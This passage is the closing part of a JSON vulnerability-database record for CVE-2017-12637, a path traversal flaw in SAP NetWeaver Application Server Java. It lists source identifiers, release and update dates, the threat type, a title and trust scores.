"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-08-07T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"date": "2017-08-10T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"date": "2017-08-07T20:29:01.120000",
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2024-02-14T00:00:00",
"db": "VULMON",
"id": "CVE-2017-12637"
},
{
"date": "2017-09-07T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"date": "2021-04-22T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201708-277"
},
{
"date": "2024-02-14T01:17:43.863000",
"db": "NVD",
"id": "CVE-2017-12637"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "SAP NetWeaver Application Server Java Path traversal vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-006983"
},
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 1.4
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "path traversal",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201708-277"
}
],
"trust": 0.6
}
}